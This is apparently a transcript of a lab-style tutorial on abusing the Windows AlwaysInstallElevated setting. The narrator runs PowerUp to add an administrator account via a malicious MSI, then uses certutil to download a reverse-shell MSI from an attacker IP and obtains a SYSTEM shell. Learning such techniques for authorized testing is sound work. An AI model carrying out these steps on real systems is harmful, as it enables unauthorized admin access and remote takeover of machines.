Hey everyone, today I'm going to show you the Windows privilege escalation always install elevated Jutsu number 9. So I got this from TCM, the Cyber Mentor, and I'm going to show you how to do it and also to study. So I have some instructions here. Always install elevated. You can detect it by two options. You can use the PowerShell script, which I like the best, or you could use these registry queries, and this is good for if WinPs or PowerUp is just not working. So it's kind of good to have if you're very unlucky. So let's do PowerUp first. I'm going to do PowerShell EP bypass, and then I'm going to load my script, and then I'm going to do invoke all checks. And we're kind of going to wait for it. Let's see. Here it is. So in the script, oh, it keeps wanting going down. It's going to say checking for always install elevated registry key, and it's going to say, okay, it can be abused. You can do write user add MSI. So we're going to do that. Write user add MSI. And what that's going to do is it's going to create a MSI in the PowerUp directory. Alright, we're going to PowerUp. Let's see if it finished. Yep. Okay, we're going to go click on this. And how this is a vulnerability is when we install packages like MSI, it does so in an elevated privilege for NT authority system. So we can make these MSI files that are malicious, and we'll be able to be an admin while we install these packages. So it's going to add a user. We can do, Amanda. And for proof of concept, let me open it up. You see there's no Amanda that exists. So we're going to do Amanda, password, group administrators. We're going to hit create. And let's check. Alright, so Amanda has been created, so we can log in as Amanda password and we'll be an admin. So that's one way to abuse it. Another way is, let's just say you don't have remote desktop. You can create this reverse shell. And then I'm going to do Python. Alright, and then I'm going to go on here, and what I'm going to do is I'm going to do cert utl f URL cache http 10.2.43.23 shell.msi and then shell.msi. So we wait for that. Listen on port 444. Alright, it's on there, and then we'll run it. And I've noticed it takes a bit. Oh, there we go. You see? I'm going to do who am I? As you can see, we're NT authority system. So that is two ways to abuse it. You either use PowerUp and use that MSI that it makes, or you make your own MSI with MS Venom, and that would be a bit easier if you just have command line only. So I'll see you later for more jutsus.